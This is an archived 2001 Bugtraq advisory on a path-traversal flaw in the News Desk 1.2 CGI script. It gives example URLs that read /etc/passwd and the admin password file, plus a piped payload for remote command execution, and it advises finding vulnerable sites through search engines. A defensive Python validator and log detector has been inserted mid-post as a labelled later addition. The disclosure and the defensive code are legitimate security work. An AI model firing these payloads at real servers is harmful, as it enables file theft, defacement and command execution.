Bugtraq mailing list archives

News Desk 1.2 CGI Vulnerability


From: B10Z Security <path () NS SYMPATICO CA>
Date: Thu, 4 Jan 2001 01:00:17 -0000

Introduction:

News Desk 1.2 (newsdesk.cgi) is a news submission
script written in Perl. It lets a remote user connect to
the web server and post news submissions without
logging into the server itself. By logging into the CGI
with a custom login and password (stored in pass.txt),
the admin can post the latest headline news to his/her
website with ease.


The vendor's website is:
http://www.ibrow.com

Problem: 

Adding the string "/../" to the URL allows an attacker to
view any file on the server, and also to list directories
on the server, limited only by what the user account the
vulnerable httpd runs as has permission to access.

Examples:

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/passwd
^^ = Will obviously open the passwd file, if
unshadowed.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../pass.txt
^^ = Will open the password string, which can be used
to log in to newsdesk.cgi and post new news, or,
with special variables, to upload/post HTML to
the htdocs directory, possibly leading to a
defacement of the web page.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/
^^ = Will obviously list the /etc/ directory. Not all
servers will list directories, but most appear to.


Note: It depends on where newsdesk.cgi is installed;
it is not always in cgi-bin, so it could be installed
under any path. Just go to your favorite search engine
and search for newsdesk.cgi and voila. There are also
some other variants of this CGI script out there; most
of them are recognizable by the news.cgi?
a=something&t=meow.html format. Notice the a= and
t= parameters, which are a clear give-away for Newsdesk.
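As an added example (not the vendor's code or the advisory's), the following Python shows the check a fixed newsdesk.cgi would need on its t= parameter, plus a detection helper that applies the same rule to a request's query string, e.g. when reviewing web-server access logs. The news directory path and the function names are assumptions.

```python
import os
import re
from urllib.parse import parse_qs

# Assumed location of the news item files (placeholder, not the real install path).
NEWS_DIR = "/var/www/newsdesk/news"

# A news item name: no path separators, no '%' (so double encoding cannot
# smuggle one in), and none of the characters Perl's 2-argument open()
# treats as a pipe or redirection ('|', '<', '>').
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def safe_news_path(base_dir, name):
    """Return the absolute path of news item `name` inside base_dir, or None
    when the request must be refused (traversal, hidden file, metacharacters,
    or a symlink that resolves outside the directory)."""
    if not name or not _SAFE_NAME.match(name):
        return None
    if name.startswith("."):            # covers '.', '..' and dotfiles
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # After symlink resolution the file must sit directly inside base_dir.
    if os.path.dirname(target) != base:
        return None
    return target


def flag_request(query):
    """Detection helper for access-log review: True when any t= value in a
    newsdesk.cgi query string would be refused by safe_news_path()."""
    params = parse_qs(query)            # URL-decodes '%2e', '%20', ...
    return any(safe_news_path(NEWS_DIR, t) is None for t in params.get("t", []))


# Constructed sample query strings, following the patterns in the advisory.
SAMPLE_QUERIES = [
    "a=view&t=meow.html",               # legitimate request
    "t=../../../../etc/passwd",         # traversal
    "t=%2e%2e/pass.txt",                # URL-encoded traversal
    "t=../../../../etc/",               # directory listing attempt
    "t=../../../bin/ls%20/|",           # pipe handed to open()
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(("ALERT  " if flag_request(q) else "ok     ") + q)
```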



Solution:

The vendor has been contacted and will release an
updated version which is supposed to be more
secure...


Special Thanks to:
zenomorph <http://www.cgisecurity.com>

who contributed this:

Remote command execution is possible on most
sites if you use the correct directory syntax; for
example, ../../../bin/ls%20/| is a working example. Many
more commands are possible if you play around with
it a bit, such as spawning xterms.

--------------------
Found By:

b10z cgi advisory.
slipy () b10z net

Found on December 10th, 2000.
Posted to BugTraq Jan 3rd, 2001.

